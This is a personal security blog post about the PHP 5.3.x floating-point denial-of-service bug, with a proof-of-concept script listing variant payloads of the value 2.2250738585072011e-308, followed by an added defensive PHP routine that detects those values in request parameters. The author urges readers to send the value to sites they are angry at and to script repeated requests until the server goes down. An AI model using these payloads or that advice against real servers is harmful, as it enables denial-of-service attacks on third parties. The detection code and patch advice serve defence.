PHP Float DoS <= 5.3.X
I'm not sure if you've heard it or not, it's actually "rather old" news now, but PHP 5.3.X suffers from a floating-point denial of service.
If the PHP interpreter tries to parse a specific number, the fork/thread (?) simply hangs and starts consuming CPU resources.
The original advisory states the following snippet:
[php]<?php $d = '2.2250738585072011e-308'; echo $d; ?>[/php]
The exploit is self-explanatory, all you have to do is to find a numeric variable on a site you're pissed enough at. E.g.:
Replace the id variable with 2.2250738585072011e-308 and watch your success when the server doesn't respond with a page.
This doesn't kill the server - but it does consume a lot of CPU resources.
Your best approach is to send several requests (code something will you?) which sends either HTTP POST or GET requests towards the server.
It surely won't take long before it goes down completely.
Yes, it's rather blackhat - but a patch is announced and people will start using this method soon enough anyway. I promise.
According to Exploring Binary, the patch was released 2011-01-06 so no harm done!
Here's a PoC script using several variations of the evil floating-point:
[php]
<?php
// Variations of the same value: shifted decimal point, leading zeros,
// zero-padded exponent and extra trailing digits.
$boom = array(
    '2.2250738585072011e-308',
    '.22250738585072011e-307',
    '22.250738585072011e-309',
    '22250738585072011e-324',
    '02.2250738585072011e-308',
    '2.22507385850720110e-308',
    '2.2250738585072011e-0308',
    '2.22507385850720111e-308',
    '2.225073858507201123e-308',
    '2.22507385850720113099e-308',
    '2.225073858507201100001e-308',
    '2.2250738585072011123456789012345678901234567890123456789e-308',
);
// The cast to float is what makes the interpreter parse each string.
foreach ($boom as $DoS) {
    echo (float)$DoS;
}
?>
[/php]
That's it! Update your PHP installation (if you haven't already).
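Until an installation is patched, the variations in the list above can be recognised before any numeric conversion happens. The following is an added example, not code from this post or from the PHP project: it normalises a decimal literal with string operations only and flags values whose significant digits and exponent match the problem number. The function names, the 15-digit prefix and the sample request are assumptions made for the illustration, and the syntax is kept compatible with PHP 5.3.

```php
<?php
// Added example. Names and constants below are assumptions of this sketch.
// 15 leading significant digits shared by every string in the PoC list;
// shorter than the full value so close neighbours are rejected as well.
const SUSPECT_PREFIX = '222507385850720';
const SUSPECT_EXPONENT = -308; // exponent once written as d.ddd x 10^n

// Uses only regex and string functions (no is_numeric(), no ==, no float
// cast), so the check never hands the input to the float parser itself.
function is_suspect_float_literal($raw)
{
    $re = '/^\s*[+-]?(\d*)(?:\.(\d*))?(?:[eE]([+-]?)(\d+))?\s*$/';
    if (!is_string($raw) || !preg_match($re, $raw, $m)) {
        return false;
    }
    $int  = isset($m[1]) ? $m[1] : '';
    $frac = isset($m[2]) ? $m[2] : '';
    $sign = isset($m[3]) ? $m[3] : '';
    $exp  = isset($m[4]) ? ltrim($m[4], '0') : '';
    $digits = ltrim($int . $frac, '0');        // significant digits only
    if ($digits === '' || strlen($exp) > 6) {  // zero, or exponent far off
        return false;
    }
    $e = ($sign === '-') ? -(int) $exp : (int) $exp;
    // Normalise away decimal-point position, leading zeros and padding.
    $sci = strlen($digits) + $e - strlen($frac) - 1;
    return $sci === SUSPECT_EXPONENT
        && strncmp($digits, SUSPECT_PREFIX, strlen(SUSPECT_PREFIX)) === 0;
}

// Walk a request array (nested arrays included); return offending names.
function find_suspect_params(array $params, $path = '')
{
    $hits = array();
    foreach ($params as $key => $value) {
        $name = ($path === '') ? (string) $key : $path . '[' . $key . ']';
        if (is_array($value)) {
            $hits = array_merge($hits, find_suspect_params($value, $name));
        } elseif (is_suspect_float_literal($value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample standing in for $_GET / $_POST.
$sample = array('id' => '02.2250738585072011e-0308', 'page' => '3',
    'price' => array('min' => '1.5e-3', 'max' => '.22250738585072011e-307'));
print_r(find_suspect_params($sample));
```

A check like this has to run before application code touches the parameters, for example from a file loaded through `auto_prepend_file`, and it is a stopgap next to the upgrade rather than a replacement for it.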
More to come!
Ciao Bella!

Hey, I'm Fredrik. I'm from Sweden, born 1990, and I have a huge interest in information technology and information security. So far, I've been studying for three years at the International IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the Swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on Twitter @Almroot.